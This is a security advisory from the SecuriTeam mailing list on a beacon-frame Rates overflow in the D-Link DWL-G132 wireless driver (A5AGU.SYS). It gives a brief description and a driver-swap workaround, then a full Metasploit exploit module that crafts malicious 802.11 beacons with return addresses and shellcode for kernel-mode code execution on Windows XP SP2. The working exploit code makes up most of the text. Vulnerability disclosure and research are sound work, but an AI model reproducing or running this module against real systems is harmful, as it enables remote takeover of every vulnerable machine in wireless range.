[EXPL] D-Link DWL-G132 Wireless Driver Beacon Rates Overflow

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
------------------------------------------------------------------------


SUMMARY

The D-Link DWL-G132 wireless adapter (USB) ships with a version of 
A5AGU.SYS that is vulnerable to a stack-based buffer overflow.

DETAILS

Description:
The D-Link DWL-G132 wireless adapter (USB) ships with a version of 
A5AGU.SYS that is vulnerable to a stack-based buffer overflow. This 
overflow can lead to arbitrary kernel-mode code execution. The overflow 
occurs when a 802.11 beacon request is received that contains over 36 
bytes in the Rates information element (IE). This vulnerability was tested 
with version 1.0.1.41 of the A5AGU.SYS driver and a D-Link DWL-G132 USB 
adapter (HW: A2, FW: 1.02). Newer versions of the A5AGU.SYS driver are 
provided with the D-Link WUA-2340 adapter and appear to resolve this flaw, 
but D-Link does not offer an updated driver for the DWL-G132. Since this 
vulnerability is exploited via beacon frames, all cards within range of 
the attacker will be affected. The tested adapter used a MAC address in 
the range of 00:11:95:f2:XX:XX. D-Link was NOT contacted about this flaw. 
A search of the SecurityFocus database indicates that D-Link has not 
provided an official patch or solution for any of the seven flaws listed 
at the time of writing: (BIDs 13679, 16621, 16690, 18168, 18299, 19006, 
and 20689). To install a patched version of the A5AGU.SYS driver, first 
install the WUA-2340 driver from the link below, then re-install the 
DWL-G132 driver. Browse to the WUA-2340 installation path, find the 
Drivers subdirectory, and copy all of these files (at least, the .SYS and 
BIN files), to your Windows\System32\Drivers directory, overwriting the 
existing files with the same name. Finally, reboot your system.

Debugging information:
All tests were performed with version 1.0.1.41 of the A5AGU.SYS driver. 
Although this driver is for the Windows operating system, Linux and 
FreeBSD users of the ndiswrapper tool should determine if they are using 
A5AGU.SYS and upgrade accordingly.

Exploit: (Metasploit)
require 'msf/core'

module Msf

class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < 
Msf::Exploit::Remote

 include Exploit::Lorcon
 include Exploit::KernelMode

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'D-Link DWL-G132 Wireless Driver Beacon Rates 
Overflow',
   'Description'    => %q{
    This module exploits a stack overflow in the A5AGU.SYS driver provided
   with the D-Link DWL-G132 USB wireless adapter. This stack overflow
   allows remote code execution in kernel mode. The stack overflow is 
triggered
   when a 802.11 Beacon frame is received that contains a long Rates 
information
   element. This exploit was tested with version 1.0.1.41 of the
   A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). 
Newer
   versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
   adapter and appear to resolve this flaw, but D-Link does not offer an 
updated
   driver for the DWL-G132. Since this vulnerability is exploited via 
beacon frames,
   all cards within range of the attack will be affected. The tested 
adapter used
   a MAC address in the range of 00:11:95:f2:XX:XX.
   
   Vulnerable clients will need to have their card in a non-associated 
state
   for this exploit to work. The easiest way to reproduce this bug is by 
starting
   the exploit and then accessing the Windows wireless network browser and
   forcing it to refresh.
   
   D-Link was NOT contacted about this flaw. A search of the SecurityFocus
   database indicates that D-Link has not provided an official patch or
   solution for any of the seven flaws listed at the time of writing:
   (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
   
   This module depends on the Lorcon library and only works on the Linux 
platform
   with a supported wireless card. Please see the Ruby Lorcon 
documentation
   (external/ruby-lorcon/README) for more information.
   },
   
   'Authors'        =>
    [
     'hdm', # discovery, exploit dev
     'skape', # windows kernel ninjitsu
     'Johnny Cache <johnnycsh [at] 80211mercenary.net>' # making all of 
this possible
    ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 3583 $',
   'References'     =>
    [
     ['URL', 
'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
    ],
   'Privileged'     => true,
                        
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'thread',
    },

   'Payload'        =>
    {
     # Its a beautiful day in the neighborhood...
     'Space'    => 1000
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     # Windows XP SP2 with the latest updates
     # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
     [ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
      {
       'Ret'      => 0x8066662c, # jmp edi
       'Platform' => 'win',
       'Payload'  =>
       {
        'ExtendedOptions' =>
        {
         'Stager'       => 'sud_syscall_hook',
         'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
         'Recovery'     => 'idlethread_restart',
         'KiIdleLoopAddress' => 0x804dbb27,
        }
       }
      }
     ],
     
     # Windows XP SP2 install media, no patches
     # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
     [ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
      {
       'Ret'      => 0x804f16eb, # jmp edi
       'Platform' => 'win',
       'Payload'  =>
       {
        'ExtendedOptions' =>
        {
         'Stager'       => 'sud_syscall_hook',
         'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
         'Recovery'     => 'idlethread_restart',
         'KiIdleLoopAddress' => 0x804dc0c7,
        }
       }
      }
     ]
    ],


   'DefaultTarget' => 0
   ))
   
  register_options(
   [
    OptString.new('ADDR_DST', [ true,  "The MAC address to send this 
to",'FF:FF:FF:FF:FF:FF']),
    OptInt.new('RUNTIME', [ true,  "The number of seconds to run the 
attack", 60])
   ], self.class)
 end
 
 def exploit
  open_wifi
  
  stime = Time.now.to_i
  rtime = datastore['RUNTIME'].to_i
  count = 0
  
  print_status("Sending exploit beacons for #{datastore['RUNTIME']} 
seconds...")
  while (stime + rtime > Time.now.to_i)
   wifi.write(create_beacon)
   select(nil, nil, nil, 0.10) if (count % 100 == 0)
   
   count += 1
   
   # Exit if we get a session
   break if session_created?
  end
  
  print_status("Completed sending beacons.")
 end


#
# The long rates field bug can be triggered three different ways (at 
least):
# 1) Send a single rates IE with valid rates up front and long data
# 2) Send a single rates IE field with valid rates, follow with IE type 
0x32 with long data (thanks gil!)
# 3) Send two IE rates fields, with the second one containing the long 
data (this exploit)
#
 def create_beacon

  ssid   = Rex::Text.rand_text_alphanumeric(6)
  bssid  = ("\x00" * 2) + Rex::Text.rand_text(4)
  src    = ("\x90" * 4) + "\xeb\x2b"
  seq    = [rand(255)].pack('n')

  buff  =  Rex::Text.rand_text(75)
  buff[0, 2]  = "\xeb\x49"
  buff[71, 4] = [target.ret].pack('V')
  
  frame =
   "\x80" +                      # type/subtype
   "\x00" +                      # flags
   "\x00\x00" +                  # duration
   "\xff\xff\xff\xff\xff\xff" +  # dst
   src   +                       # src
   bssid +                      # bssid
   seq   +                       # seq
   Rex::Text.rand_text(8) +      # timestamp value
   "\x64\x00" +                  # beacon interval
   "\x00\x05" +                  # capability flags
   
   # ssid tag
   "\x00" + ssid.length.chr + ssid +

   # supported rates
   "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +

   # current channel
   "\x03" + "\x01" + channel.chr +

   # eip was his name-o
   "\x01" + buff.length.chr + buff +

   payload.encoded
        
  return frame
 end

end
end


ADDITIONAL INFORMATION

For the original advisory visit  
<http://projects.info-pull.com/mokb/MOKB-13-11-2006.html> MoKB.
 <mailto:hdm [at] metasploit.com> H D Moore - discovery and exploit 
development.
 <mailto:mmiller [at] hick.org> Matt Miller - kernel-land staging and 
debugging.
 <mailto:johnnycsh [at] 802.11mercenary.net> Johnny Cache - debug, test, 
ninjosity.
 <mailto:lmh[at]info-pull.com> LMH - MoKB release.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.